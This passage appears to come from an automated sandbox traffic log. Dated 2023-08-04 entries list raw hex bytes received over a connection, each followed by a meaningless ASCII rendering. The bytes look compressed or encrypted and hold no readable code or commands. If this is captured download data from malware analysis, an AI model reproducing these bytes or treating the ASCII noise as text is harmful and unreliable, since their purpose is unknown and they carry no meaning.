d6 05 98 03 4d e1 45 4e 97 cd 7f 18 ee cd f6 4f f5 13 d0 1f 05 e6 05 a3 cf 1f 23 5c e6 7d 90 28 f3 fa dd 0c 6e 67 71 47 00 65 d9 6d e6 a0 32 15 1c 4e eb 41 8b 10 6f 1b 66 42 4e 5b 96 26 09 7d 1a 5b dc c1 4f
                                                                                      Data Ascii: aL%0z!D264]#4|tspbqH]6#&;blCuW@Il{e&`PG@^a]o&9pG+RGn%P2g<`<6nTeMENO#\}(ngqGem2NAofBN[&}[O
                                                                                      2023-08-04 16:48:40 UTC2122INData Raw: 5f c2 60 3c b5 67 84 81 41 f1 d6 c4 f9 d8 53 25 d9 21 5a c6 ed 7a 87 4e be 63 3a 88 11 1c b3 30 30 58 06 ef f8 9f 52 9f 09 61 d5 ac 4f 82 82 44 f0 d0 e6 46 6a d7 cf ea 47 85 20 7b ae 92 07 31 c8 c1 80 1e f1 cf c2 59 67 db 62 02 d9 c2 72 5d d2 41 48 76 b0 b7 ea 26 45 7d 74 40 b2 02 e8 75 ed 26 0b af df 5b 84 14 32 ae 82 d5 89 3b 03 ec 80 7a bc 8a 34 15 6b c1 ce f2 eb 63 74 d7 ea 64 af 18 03 e9 83 29 51 91 06 45 b2 0e 4d 41 b0 81 89 fb eb 19 b5 90 f1 00 38 80 05 2e bb a0 4c 78 9b f4 87 35 3b 3a 50 df 42 2d 7c fe 76 cf ae 46 3f bc b7 0b c3 66 d1 39 ae 96 66 65 15 f5 de fd 97 1c 2c 1c ff 42 83 91 31 7d 8b 19 59 e1 13 57 0a 71 80 33 1d 2a f0 7e 3b ac 0e 56 37 42 d3 24 6c ce 42 ad 12 e7 09 9b 6c e9 27 c1 2b 0c e7 bf 5b 80 f2 1e 69 cd 96 d9 48 05 fe a5 b6 e8 ec
                                                                                      Data Ascii: _`<gAS%!ZzNc:00XRaODFjG {1Ygbr]AHv&E}t@u&[2;z4kctd)QEMA8.Lx5;:PB-|vF?f9fe,B1}YWq3*~;V7B$lBl'+[iH
                                                                                      2023-08-04 16:48:40 UTC2126INData Raw: 9a 61 fd 9e 27 c8 99 4c d8 04 c2 b2 8f e3 3c 95 78 03 c3 28 13 38 cc 4d 8e c8 30 7c 11 af 08 74 af 9e 36 60 9a 1d 0a 30 2f a0 da 1c e1 74 f4 47 0f 16 47 53 5e d3 a1 9b fc 4e ba 12 33 57 68 ad 4a 9e a8 bc 20 16 bc 50 d1 ff 79 ec a4 46 b9 ac a5 3b 01 2a 9c a3 aa 5c 73 bc 85 30 52 26 27 c9 b6 01 c6 07 38 fe 3c b8 57 d8 18 5c 47 10 ac 40 a4 fc c8 78 e1 9c c5 49 3d 33 13 44 b1 ad c6 da 3a ef 38 25 1d b4 a5 00 b3 2f fd 51 a2 d4 55 a2 2a a4 02 85 e4 d6 34 a3 c2 d3 d1 fa 9c 83 ef e3 e5 c2 37 5e d7 27 84 b1 f6 6a 64 16 a0 b8 23 15 6b 6f 9e 98 be b3 b9 ea 55 7d e6 f5 36 88 4c 1e 50 95 3c 93 47 48 f8 41 29 95 37 e8 96 29 34 50 ee df ad 5f e1 ba 43 02 34 02 28 bb 4c 06 3d 0a 87 91 bc f9 78 f7 3e 7c a5 64 8d 98 b7 3c c1 54 72 b8 c5 da 87 0f a5 6e 99 5c 38 75 db af 10
                                                                                      Data Ascii: a'L<x(8M0|t6`0/tGGS^N3WhJ PyF;*\s0R&'8<W\G@xI=3D:8%/QU*47^'jd#koU}6LP<GHA)7)4P_C4(L=x>|d<Trn\8u
                                                                                      2023-08-04 16:48:40 UTC2130INData Raw: d3 c0 69 3d e6 d7 8b a1 98 9d d1 5c 5c 71 76 24 32 85 d5 ee 52 c5 4f de 3d 00 f7 c8 d4 de f7 b2 8c 2b 76 59 37 ef 43 e2 83 b6 8c fc ea 79 1a a5 0a a7 e2 d2 23 ba 0e 78 48 47 ac 6a ba ea 06 ca d2 af 31 a4 54 46 65 7a 4e e0 5b 71 99 99 42 cd 33 bd 6f 49 11 86 fc 6e 16 42 f6 41 57 59 fa 47 83 59 e4 e2 91 d1 66 48 d4 f6 05 b8 99 1c 70 55 eb e3 77 5e 81 17 2c dc 19 14 43 a7 39 9a 65 06 dc c5 83 39 c7 3e 1e 8c 18 25 ad 3e ee f7 b5 cb 80 79 5b 44 f1 b9 d4 03 1a af 55 36 8e b9 60 21 55 77 52 24 be e5 50 46 89 61 59 c0 4e c7 0c 0e 2c ea b4 7b c4 7a a3 ab 71 9d 71 f0 6a c5 90 1a b4 3d fe b4 b6 11 6b ae 5f d4 53 9d f2 ba 20 59 ca 35 26 28 0c 27 fc 5c c1 a0 ee 7b 13 9e 77 f0 f0 e1 57 1d ed 40 cc 1a e2 b7 ec 56 8f a3 fd c5 f3 58 07 9c 0a 90 c1 2b 1f ca f3 19 c5 0b 6c
                                                                                      Data Ascii: i=\\qv$2RO=+vY7Cy#xHGj1TFezN[qB3oInBAWYGYfHpUw^,C9e9>%>y[DU6`!UwR$PFaYN,{zqqj=k_S Y5&('\{wW@VX+l
                                                                                      2023-08-04 16:48:40 UTC2134INData Raw: e0 fe 50 5e a0 60 2a 74 9d 56 fc 72 88 68 7c f6 2c 80 0b 33 54 0b 9e 8f 78 50 64 65 98 24 8e 1d 28 7a ab d8 08 49 71 95 bb 80 59 a2 4a 06 ce 86 c5 28 47 78 3a 26 df e4 f3 88 45 88 e5 1e b1 d1 07 bc 2c 55 14 55 d5 c4 c9 6c e2 dd aa ec 2a 92 ba 4f ab dd ea 14 4a cf eb a0 6a 2d 5f 7f a9 f2 b4 f0 4c 32 69 d3 e9 22 bb ec 00 e5 66 af 1e a2 b7 3f 3b a8 53 a5 7c a5 63 7c e6 04 06 30 51 dd 69 cf 5b 56 2c c5 74 62 82 99 7e df d0 b9 0e 14 bc 88 67 c8 ca fd 6c b2 0b ca e2 59 e7 9c 3c 18 51 89 41 10 c9 4f c3 5f 32 e3 98 c3 fa c5 03 74 0c 79 74 d0 23 1c c4 fd 49 b8 72 37 b3 39 c3 fa 9f 4c 5d aa 09 29 7a 33 c3 f3 3c 76 88 a4 4a 31 d5 0e 33 c2 05 e9 82 08 c6 95 6e bd a9 61 34 91 92 eb 32 c8 43 21 91 c7 a0 d3 8a 5c 82 cc 06 1b 12 af 32 92 de db 09 c7 8d 45 20 7e 72 0f 38
                                                                                      Data Ascii: P^`*tVrh|,3TxPde$(zIqYJ(Gx:&E,UUl*OJj-_L2i"f?;S|c|0Qi[V,tb~glY<QAO_2tyt#Ir79L])z3<vJ13na42C!\2E ~r8
                                                                                      2023-08-04 16:48:40 UTC2138INData Raw: 53 8b 83 3b 90 bf 6f 4c 9a 14 a7 1e f2 1f bb 76 8d a9 70 21 56 a1 a0 2a 0b 48 c8 eb 6a 0e 4f cf 33 0e 9a a4 6f b9 5f a1 bc 29 6c 59 6a 58 80 a9 7a cf 4b dd cc 98 ac 73 0e b9 e6 1e 7d d5 2a 40 7a da c5 fa 78 53 e6 d4 a0 a4 e5 29 fe fa 72 c1 4c 24 e6 ae a9 6f 4c a0 dc b7 2c ec 63 3e 36 90 23 7f cf b6 19 a5 35 59 20 2f 13 a2 77 1a b9 71 19 e3 82 f5 26 30 42 91 48 74 ea 29 56 dc 38 5f 72 52 16 aa d5 40 42 05 cd 25 d2 a7 b2 42 f7 a2 ae 74 8f 27 6d 63 71 45 1f 7b 8b 73 a2 8b 46 50 2b b7 2f b1 8d a2 4c ab df e6 43 8b 50 c8 18 ba 46 c2 01 20 e6 c0 40 42 d3 0b 5c 93 cb ab fa b5 dc a0 f3 13 f6 9e 05 58 23 c9 26 5e ac 98 ee ab 3a a0 64 1a 84 8f 16 d9 2f c0 a9 5d 2d f6 d3 6b 73 67 85 e6 64 55 e8 09 ea 92 bf 8e d1 89 14 cd b1 aa 13 f0 8f a8 87 7d 4b 66 b4 51 f9 6e 71
                                                                                      Data Ascii: S;oLvp!V*HjO3o_)lYjXzKs}*@zxS)rL$oL,c>6#5Y /wq&0BHt)V8_rR@B%Bt'mcqE{sFP+/LCPF @B\X#&^:d/]-ksgdU}KfQnq
                                                                                      2023-08-04 16:48:40 UTC2142INData Raw: 3f a7 71 df fc 20 51 62 25 1c 0c 91 86 c0 81 cd d2 51 a1 d4 84 1d a5 22 cc 83 54 9a 12 be 8f e0 90 e1 7d 3d 26 e8 fb f6 db 1b 40 c5 8c 77 2c 8c e9 c3 eb 63 ca 55 5a 7e 50 9f 1e 7b c8 95 8b f0 45 2e 7b 15 71 b4 f4 21 8e 06 37 f3 e8 9f de fb d5 f6 8e d2 c3 0a 56 0b 16 18 84 fc 0e c0 ea 7f 90 27 05 b2 82 52 f5 6d 4b 9f 8e c6 c5 49 58 9f 7f 17 a3 64 a6 6d 67 6e b3 fe 8e 98 4e 15 14 29 3b 39 50 36 68 f3 9b b4 37 91 50 a0 11 42 a1 a2 6a 3e 07 75 b5 31 52 d9 5b 80 b7 d2 7d cc 6c 62 7f e3 a2 44 c5 2c 94 23 83 22 f5 14 20 45 41 33 df cd 35 ad a2 be e4 ac 50 28 83 b6 57 d6 0b b4 f7 8a e1 0e 4e a8 dd 6b 4e 02 82 04 ad ae 11 12 7d 0b 36 15 0c 32 3a 24 ca 46 a0 fa c3 9e e9 e7 0c 34 51 2e 4e d8 8f d1 fe fc ce 3a 24 84 50 b6 d7 33 0d e7 26 0e bc 9f 4d 3d da 68 58 aa f4
                                                                                      Data Ascii: ?q Qb%Q"T}=&@w,cUZ~P{E.{q!7V'RmKIXdmgnN);9P6h7PBj>u1R[}lbD,#" EA35P(WNkN}62:$F4Q.N:$P3&M=hX
                                                                                      2023-08-04 16:48:40 UTC2146INData Raw: d9 0f da 93 d0 fa 61 b7 03 d3 1c 4f 4a 43 88 e5 42 9b 4c 47 1f 2a 14 1e ed 15 eb eb 9c 3b 5f c1 cb 16 bb e5 38 d7 95 b0 31 ec d8 c6 d8 17 6a 98 60 db 16 81 b5 64 22 f7 75 77 cd 45 83 56 cc ee 1a b7 e3 bc b6 86 33 32 8b 46 ec 13 8f 6b 2e 88 90 ac 05 af 6e 22 d7 a7 6c 9c a2 49 41 d8 a1 46 fd 40 43 f9 76 6a 3e a4 d0 ca a4 91 0c e1 38 e4 c5 a9 9e 79 53 26 31 70 32 4c 74 31 37 4e 90 db 6d 75 35 c5 c2 7a 75 3f ca 59 8c 6c d1 f0 a6 12 4d a8 c6 aa ef e1 ef 96 1b 68 48 ab 45 ee 30 75 eb 79 1a f5 e5 8c 0a b3 e2 86 0c 03 97 1b b2 4a 19 38 fa 92 80 41 8e 3a 84 6d de 69 5c f8 d7 66 7d 86 1f c6 41 db 35 ff 1b 5c 4c 92 2f f4 f5 41 5f ce a8 eb 57 72 90 28 1d 21 dd 40 2c 84 81 4e 79 73 65 40 86 dc 8b 8e 9b f4 4f f6 0d d3 ca 12 55 55 de 36 fb 50 92 fc a4 b5 ed a5 e0 3d ec
                                                                                      Data Ascii: aOJCBLG*;_81j`d"uwEV32Fk.n"lIAF@Cvj>8yS&1p2Lt17Nmu5zu?YlMhHE0uyJ8A:mi\f}A5\L/A_Wr(!@,Nyse@OUU6P=
                                                                                      2023-08-04 16:48:40 UTC2150INData Raw: 46 d2 0d d8 0c e4 ba 3c 22 fc 86 a2 76 db de 97 f7 83 07 3a 2e 2b 16 fa 61 47 67 81 b2 e0 81 f1 fb 2e e2 83 12 86 bf 6f 71 28 1f 1e d7 a9 65 71 ca 16 e2 96 6e b4 56 75 1c e3 2b e6 f1 e2 4d 0f e5 9f ac 52 4a 8d ad 36 d4 6b ac e7 47 3d 58 a7 09 33 8a ce fe 9a 9a b8 42 6f d6 04 86 be 61 cb 30 33 7f 0d f2 be ab 74 04 f3 b5 eb 77 a8 cf 66 ac 42 f1 6e 21 f3 58 2d d6 fc f3 cc fb 68 26 ef a4 f2 7f 80 88 6a 3d 35 53 10 34 ae c6 15 0b 4b a9 4d cf ab 04 41 65 38 e5 6c bd ab 96 ec 47 43 10 da 16 e0 f7 8d 59 39 c8 2b ca 71 3a 93 d4 40 a0 be 15 b6 38 24 4b a4 66 6e 84 36 36 f2 06 c1 3c fa 68 db 9e b9 53 51 2c 4f b0 56 30 2a 86 05 c0 1c 4a e9 d2 fe 5a 79 b6 c7 71 5d 30 df 79 81 23 f6 25 b1 27 4b 26 a6 f0 91 0e e0 48 68 45 e7 3f 90 c8 a0 05 b2 4e ad f6 a1 e0 2e 77 39 d9
                                                                                      Data Ascii: F<"v:.+aGg.oq(eqnVu+MRJ6kG=X3Boa03twfBn!X-h&j=5S4KMAe8lGCY9+q:@8$Kfn66<hSQ,OV0*JZyq]0y#%'K&HhE?N.w9
                                                                                      2023-08-04 16:48:40 UTC2154INData Raw: 77 fa a5 d1 3d d3 e6 4d ba 34 2d 70 3d 19 3a d4 3e f3 09 38 da 61 96 b2 78 ea ec 58 84 0c 8a 3d ca 5c 05 22 0c e2 32 54 39 a7 0b 94 6b 7f bc ea fb 62 e5 86 db bd 3c 39 c0 70 d2 f7 b2 a1 94 de 89 d0 70 2b 50 9e 53 f8 5e ad 8b 50 da 24 4b 35 75 c2 ea b1 f6 16 b7 ad c7 57 a0 26 2e fc 35 8e ea f8 c8 e3 7c df 40 29 83 96 c9 6c 68 a3 e8 6f 8a 27 2c 89 25 37 60 9c c3 0d 63 91 0c e8 63 01 1e c1 e4 3b 73 da de 67 19 81 0e 7b 93 84 8a 98 85 61 08 be 08 d7 f5 97 9a 91 3f eb 97 9d ad 7a d5 88 dc 7f 6f f5 28 c6 f0 b4 c3 9e 14 87 f2 df 3f d8 b8 0a 5f b3 5d 8b 8f 00 6e 3e b0 4c c6 6c fb 9b 84 99 dd db 2c 83 ce 2f 8e 30 b5 6b 2b c3 e5 2b 9a 02 4f 5b d4 54 43 e2 e2 a8 8e 31 c3 78 7e de 16 18 89 dc f4 59 c7 fc 9a d4 3d 58 d5 e7 fa f0 ad 27 1a 52 56 64 e2 cf b8 54 fb 12 33
                                                                                      Data Ascii: w=M4-p=:>8axX=\"2T9kb<9pp+PS^P$K5uW&.5|@)lho',%7`cc;sg{a?zo(?_]n>Ll,/0k++O[TC1x~Y=X'RVdT3
                                                                                      2023-08-04 16:48:40 UTC2158INData Raw: 75 4d 17 4d af 5b 9c 9c 4f 85 4b 4d 04 eb 28 2a 19 7b 2d 2d c3 8a 8a 95 02 fc f3 70 e1 be 4e 60 93 11 ae ed 76 28 8a 36 d0 f1 9d 98 d2 c9 b0 93 4c 3f 7f ff 6a 09 81 a6 13 a7 bc 5b 4f fc e4 54 2a 93 ca 85 c9 6e c8 57 ec cb 54 bb db 6e 3f a4 5d 36 bb a6 c5 80 f0 72 cc 35 5a 7d 3a 52 79 5e 5c a8 22 5e 74 a1 ba 16 1f f3 92 f2 b6 f9 90 ac e1 16 3b 94 44 63 f1 5d b8 dd 5e 0d 09 a2 b9 ad fb fc 15 5b ff 10 6d 98 06 17 3a 00 c3 aa ec c9 92 f7 dd 5d 47 06 fd 95 3f bd 46 f1 c2 76 b1 2c 3b 64 9e 9a d8 f1 c3 82 a4 13 ae 52 81 4a ae 1c 6d 40 35 58 98 7d 0b 84 5f 31 c6 59 66 7b 21 20 54 8c 51 70 dd cc 84 ad 4a 85 17 e8 a7 40 e7 e6 15 0e d1 57 ce 7a ba cf f0 b5 a6 19 e1 52 ff 99 64 98 ff 0e 4c 7f 84 11 c0 1d 3e cc 29 fe c9 7d f7 d3 f1 1f 7b 37 fe 3f 8a 2e 82 f4 fa 73 8b
                                                                                      Data Ascii: uMM[OKM(*{--pN`v(6L?j[OT*nWTn?]6r5Z}:Ry^\"^t;Dc]^[m:]G?Fv,;dRJm@5X}_1Yf{! TQpJ@WzRdL>)}{7?.s
                                                                                      2023-08-04 16:48:40 UTC2162INData Raw: 0d 9c 66 cc ae ab a0 fd 51 72 fa 72 8e e0 a0 ec 48 ae 3a e7 7d a1 47 b3 9a d2 61 13 c3 dc 0c 26 ad cb 3b 01 b1 1b 38 21 d9 d3 9c 5d af f8 5c 2b f8 8e 15 c8 f0 a2 56 d3 78 73 6d 54 e4 df c1 0d 3c cf 13 6f 3a 1a 85 5b 3f a5 e0 64 60 e7 ec f1 e7 f9 ed f5 34 cb 90 7b dd f7 b3 ca 89 01 9c 8e 61 a0 bb 02 02 b6 67 a4 29 f9 ba 10 85 21 38 ed 1e 9d 8f e4 45 53 0f d8 b4 09 56 09 3b 8b 96 a6 36 a3 3e 6f 10 d5 af 88 f0 9f 7f 52 4b 0e b3 18 50 2f dd aa cb cc 3e b4 a9 08 62 ff 91 62 9a 8d d6 73 53 06 d1 3c c8 be 74 3b 43 1b 64 bb e4 9a 6f 36 bd 50 19 96 7a b0 9c a3 88 c0 3f 8d 2e 2b 7c 49 65 27 66 b4 e4 d4 bb 26 77 e8 10 60 c1 76 35 78 6c ca 5d 69 fe 1e e6 03 c5 d1 9c 51 c3 04 6b 74 c5 84 72 1d 61 34 16 dd ca 04 b6 d1 bd c6 a0 f6 55 fd 0b c7 4f b3 77 87 03 7d 0d 0b c0
                                                                                      Data Ascii: fQrrH:}Ga&;8!]\+VxsmT<o:[?d`4{ag)!8ESV;6>oRKP/>bbsS<t;Cdo6Pz?.+|Ie'f&w`v5xl]iQktra4UOw}
                                                                                      2023-08-04 16:48:40 UTC2166INData Raw: 70 ac 11 49 23 db b6 a6 a7 79 8b ac 77 65 51 3e 25 77 b4 5c a4 6f 4f bc 8e 1d dc ac ab 19 c8 8b be fc e2 c4 77 cc ea 2c 06 2c bf e7 e7 15 03 6d 95 ff bf 19 16 0a e3 88 da cf 56 7b 79 d0 ac 2d d9 7b 52 73 4d 4d 7d 48 05 88 28 50 4a 83 10 41 21 6b ea 69 18 fc 0d fa 1e aa de 39 67 11 2e 22 49 77 9a d2 10 c1 df d9 c6 0d b1 0f 8e b2 78 40 8d 33 eb e0 37 16 3f 35 2c c2 40 9a 09 8e 27 ad 3d 78 ed 1b 06 ff ec d9 da 15 fd 3e e3 9c c2 8b 0f e6 9f 91 e9 a0 10 53 87 9c c8 7e d6 25 be 99 16 2b 62 63 8a 84 9c 06 e1 1f b6 05 69 5e 06 31 9d 05 90 95 c2 00 02 9b c3 d6 09 b6 45 f0 73 36 fe 6c 95 b0 04 67 7f 69 a2 6b 5c db c2 10 d7 26 d4 2d 4d aa ec f8 8e b4 5e 40 dc ae fb 43 93 7e 95 f4 8d 30 3a 38 38 ae ba b1 8d 0d 9f d0 e1 77 82 d3 75 9a 21 31 3e da ce a8 82 69 9c e6 a8
                                                                                      Data Ascii: pI#yweQ>%w\oOw,,mV{y-{RsMM}H(PJA!ki9g."Iwx@37?5,@'=x>S~%+bci^1Es6lgik\&-M^@C~0:88wu!1>i
                                                                                      2023-08-04 16:48:40 UTC2170INData Raw: 27 f2 d8 1f 13 20 ce 6e 03 6e ab 29 5b f8 bf 24 ab fe 36 76 7c 66 22 8c 9d 61 4d 50 c8 a1 0f 05 a1 77 89 e4 90 54 5d 99 22 9e c2 87 17 47 84 34 69 9b 5d e7 8f 9c 46 82 20 fc a2 1e 54 55 08 25 a0 40 84 f1 db 54 43 3f 20 d7 95 63 97 47 32 1d 9a bb 8b 68 db 97 97 97 a5 f3 16 c5 83 48 32 7a ec 6f 1e 47 35 51 e4 8c 61 96 91 5a 0c af 40 c7 7c 33 e3 de 36 96 50 c9 31 14 14 cc 0d f4 09 e3 59 73 75 7a 25 e5 d1 1c 92 18 7a 24 d2 53 79 13 b5 34 03 65 27 9f 50 f6 fe 47 e3 62 a0 c2 53 d0 46 90 14 16 7c 37 0c 6c 26 4b 9f b4 f1 03 f0 36 64 7a c7 9b 0c 10 51 61 65 1a 6c 9e b4 50 d2 f0 d4 27 ee 15 3a 94 33 85 17 b7 64 3c 4b a6 cb 2d 95 4f 13 f4 dd 98 49 bf 07 42 32 be c9 54 01 e0 39 01 da cc e9 a2 bd e9 2a af d9 70 ac 1d b2 2e 94 79 c1 ef de ee 66 b1 19 ae eb b0 f3 8d 84
                                                                                      Data Ascii: ' nn)[$6v|f"aMPwT]"G4i]F TU%@TC? cG2hH2zoG5QaZ@|36P1Ysuz%z$Sy4e'PGbSF|7l&K6dzQaelP':3d<K-OIB2T9*p.yf
                                                                                      2023-08-04 16:48:40 UTC2174INData Raw: 09 dd 96 42 48 e7 04 3a bc 7e 4a 81 cc 33 7b cf b1 38 3d 40 86 64 d5 78 65 bb 41 b4 65 cd 70 df 5c 46 25 03 70 d8 88 db 1b cf 08 38 15 eb cc 4a 3a 6d a2 df 0c bd c8 aa 93 b2 79 8a d7 4e ad 4d c1 7f ae 9b db 66 0d 07 34 52 6f e2 56 22 7f 62 4b df eb 84 ed 2d 57 af e0 31 a7 08 dd 48 86 7c cd 59 1e 7e 98 2f c5 ee 26 9b a7 85 27 26 d8 a7 c8 4e fc b8 d4 12 4f d5 01 10 e6 4c 1f 83 7f 86 6b 02 73 78 e1 14 50 16 7c 9b c4 b6 85 13 32 c9 1e a7 09 db fb d2 99 8f 46 b1 75 95 e3 90 3f 45 3d 2b fb be f4 72 70 2c 87 92 0f 6e f3 5c 63 ad 42 63 72 a2 e7 4d 3f f8 89 71 8d 41 a4 36 d2 a0 13 54 2f ff 5e 1c a2 5b 68 0e b2 9c e4 50 84 39 c1 fe 60 a4 2e 17 06 85 03 9d 71 2e fa 25 ee 1d cb e5 d5 85 d6 63 d6 d6 8f 85 77 f8 d2 f7 d9 f6 c3 b4 d9 a3 fd da 04 fd d1 53 3a 45 ab 18 bb
                                                                                      Data Ascii: BH:~J3{8=@dxeAep\F%p8J:myNMf4RoV"bK-W1H|Y~/&'&NOLksxP|2Fu?E=+rp,n\cBcrM?qA6T/^[hP9`.q.%cwS:E
                                                                                      2023-08-04 16:48:40 UTC2178INData Raw: 23 66 1a a2 99 a8 89 93 f9 e6 45 5c 54 1b 48 7d ae f5 5c 37 2b c0 08 8e d1 82 d8 a1 56 35 7a 26 84 67 84 78 d2 18 4f e2 ea 1b 7d 95 1a f1 e0 b0 dd 3c d5 3f da 3b b9 d4 6c a8 5b fe c1 29 3c 95 ab 03 e9 86 47 56 61 2e 8b 70 3e 3c a5 f3 a2 2f 88 07 45 db 6a 38 9e b1 71 af 75 e3 e9 55 25 c8 45 eb c0 38 f0 9f f2 a6 7a 01 3a 3a 27 9d 8e 96 06 ec bb 50 30 0e fb ea 6b 13 f5 cf 88 83 2b 50 75 7c 02 36 bd 1e 7f 9d 6e 5f 3e 8a 26 6c 83 56 d0 45 82 20 d6 1f 67 11 0c 0e 76 77 c3 ff b6 bf 31 49 28 a9 f0 e5 5e 61 6a 3d 30 5b 78 cf 00 f5 86 ff ee b9 6d 65 8f 3f 7a f2 e4 a5 65 57 8d 76 6a e4 6d 07 47 fe 4c 5a 91 8b 1e 24 1e fb ac 4b c2 98 5a 41 14 ea 82 ae 40 cf ee 70 64 3d ef ad 1a 8b 60 ca 10 a4 02 b3 62 50 02 84 f1 1f fd 4d da 26 0c e7 e3 6f 3b 8a f1 64 43 8b 00 6d 5f
                                                                                      Data Ascii: #fE\TH}\7+V5z&gxO}<?;l[)<GVa.p></Ej8quU%E8z::'P0k+Pu|6n_>&lVE gvw1I(^aj=0[xme?zeWvjmGLZ$KZA@pd=`bPM&o;dCm_
                                                                                      2023-08-04 16:48:40 UTC2182INData Raw: ce f6 cc 24 38 08 30 4b be 1e 67 57 31 55 30 64 c8 e3 e1 ca 16 7d 5d ce b1 06 22 be 4a f5 66 82 7d 7c fe ba cc 2e 7b 54 c1 0b 9a d9 9a 50 3f 7a d5 22 d3 a7 73 c7 12 3f b9 bc 7d 59 60 5b 87 9f 20 78 cb af c3 0e 71 fb bb 80 3c f1 0a a5 1e 54 77 4b 10 74 97 94 ad 57 57 b6 4d f4 e2 70 f3 f1 85 9b 07 16 38 e4 8a 65 91 1a 65 df 1c 55 77 ae b2 d1 90 4e fe 25 95 64 b3 fe 0f 35 7d 5c bf a1 83 e1 82 e0 42 aa be 03 9a 1f 51 c5 e8 1f 39 5d eb b4 39 a2 7f ea e5 29 e9 f8 54 28 f7 a8 76 5d fb 8a 70 29 f2 7b 0a 43 c0 91 70 af d7 1c 62 66 3c 0f e9 32 50 40 e8 d5 b8 38 21 4f 22 82 a6 93 9f 42 78 6a 3f 00 38 2d 1a ed db ad 2d c3 a5 53 14 cd 4e 31 0b b8 09 9f 07 3f 28 48 0c 59 00 52 25 61 f6 9b da 4b 4b 3f 74 31 af 33 de 1d 6c 5c ae 23 ec b1 3b 16 a8 39 3d 3b be bd e8 ba 47
                                                                                      Data Ascii: $80KgW1U0d}]"Jf}|.{TP?z"s?}Y`[ xq<TwKtWWMp8eeUwN%d5}\BQ9]9)T(v]p){Cpbf<2P@8!O"Bxj?8--SN1?(HYR%aKK?t13l\#;9=;G
                                                                                      2023-08-04 16:48:40 UTC2186INData Raw: 74 68 81 9b 1c b8 a1 51 d6 7e a9 8b 2a d6 1b aa 48 9d a2 15 a9 30 fa 7b 85 44 90 c7 10 b2 e5 63 fc 48 ef b3 3e e0 11 5a 77 3f ee 80 49 44 8f b7 6c 43 e5 ad 32 86 80 48 67 88 c8 74 ae d9 65 31 b3 a8 f0 b9 d6 cb 96 e4 0e 6a e6 d6 df df 45 aa d0 9e 81 9a 8c 77 eb 3b 91 d0 43 7c 73 90 40 a0 c4 22 eb a6 d8 03 de c7 a7 39 8f 23 a5 68 37 1f a9 06 c9 f4 77 3f e7 38 5e 72 5d f0 89 d1 bd 4b be a9 1e 6a 38 2d 34 18 c6 a2 23 88 d1 39 9c 60 2d 3f 8d 43 7c ae 85 ae 58 10 2f 18 77 2f 20 1c 61 71 40 3a e1 77 41 a3 1a f8 10 d3 24 56 b7 04 6a ee 5c 17 67 8a 33 73 25 a7 7f 14 36 4b f8 b0 05 14 35 56 a8 86 05 e4 c0 6a 83 22 75 3a bf 4c 2b 99 aa cd ce a8 59 e8 40 ac c1 c3 b0 20 f1 cc 6a f8 22 fa 5e f4 4c 3e cf 88 08 57 9d fe 42 d7 aa c7 e7 fa b3 c7 e9 68 37 14 f1 52 08 6a 49
                                                                                      Data Ascii: thQ~*H0{DcH>Zw?IDlC2Hgte1jEw;C|s@"9#h7w?8^r]Kj8-4#9`-?C|X/w/ aq@:wA$Vj\g3s%6K5Vj"u:L+Y@ j"^L>WBh7RjI
                                                                                      2023-08-04 16:48:40 UTC2190INData Raw: 72 28 d9 81 43 bb 43 51 9a 08 e1 b2 97 d0 c5 bd 75 3f 71 60 8b 68 28 55 7c a4 25 1c 50 9b e8 ef fc 5d 0e 79 ca 59 00 9a e6 14 fe bf 8b 6a 3a ba 64 dd b4 fb bf f2 8d 06 f4 05 fe 81 be 93 30 9c e4 50 83 a9 83 c7 3b b6 83 95 64 c2 a2 94 96 60 8b b4 a2 e0 94 b7 ac dc a6 03 99 e2 38 45 a6 e2 c3 2b cb e1 12 51 97 99 52 83 d0 2c 7c fd 82 ff ae 59 8e dd 93 68 22 96 c5 84 cf 64 af b1 d0 00 12 d8 64 86 04 c5 e0 41 d0 be e0 88 dc 6e 98 8e 89 3d 40 6b ba d2 f3 95 a0 e2 41 83 81 9b d6 a2 87 72 a2 45 5d a1 80 e6 56 f4 eb 19 83 b4 e3 be 6e 25 b1 75 d7 b7 1b 03 69 94 0b 34 38 34 7e d1 fe fd 99 9f 87 8b 18 e4 3f 53 5e fb fb aa 42 3a f5 b2 e2 df a1 a4 38 12 a3 dc a9 0d 4a 56 c3 3f 2e 8b f7 29 cb 50 f7 f6 73 6a f8 38 33 03 c3 32 6b 5d 7e c8 a6 97 c0 d3 a8 fa 4d 8c 3c e9 ba
                                                                                      Data Ascii: r(CCQu?q`h(U|%P]yYj:d0P;d`8E+QR,|Yh"ddAn=@kArE]Vn%ui484~?S^B:8JV?.)Psj832k]~M<
                                                                                      2023-08-04 16:48:40 UTC2194INData Raw: f7 a7 aa e2 30 03 70 0e 0d f2 52 ee d0 ba 61 fe f9 84 4c bc bc c4 42 5f 21 8c cd 62 e4 bc cf 5b 2f 01 6b 93 87 a8 1a 67 c5 85 21 77 79 44 ea dc e7 b3 d1 92 78 8b 35 17 cd c6 ef 99 71 4c 8c 0a d0 88 96 46 35 f1 6d 8b 30 4a d9 17 94 b0 eb be a3 05 94 ad e7 b5 ca 6b d4 e0 0f e9 31 35 81 95 55 7d 60 91 48 c4 92 de 14 42 75 41 50 91 47 1d f5 4a b8 af 18 68 7e 97 42 91 19 ac 66 28 4b 7c 64 10 a9 83 e8 9e 51 f0 6e 3d 93 cb d7 b6 b4 c8 2e 14 d5 66 4a 06 1c cc e8 3d 2d 39 63 02 85 bd 04 d6 32 8c af 6c d5 bf d5 6d 7b 2a 5d eb 58 f0 df 21 94 91 98 c7 e6 68 d1 35 66 f8 98 a7 a5 69 2f 9a 4d 7f 6a e5 fb 76 83 b3 e8 2e 19 d6 65 46 8a 31 f0 f3 b3 8f c5 8f 81 3c c1 28 62 b3 2e 0e df e6 64 f8 b9 16 93 07 f6 20 74 3e 41 73 42 87 fa a4 e0 b3 c4 81 df c5 0a b8 e6 9d d3 05 b5
                                                                                      Data Ascii: 0pRaLB_!b[/kg!wyDx5qLF5m0Jk15U}`HBuAPGJh~Bf(K|dQn=.fJ=-9c2lm{*]X!h5fi/Mjv.eF1<(b.d t>AsB
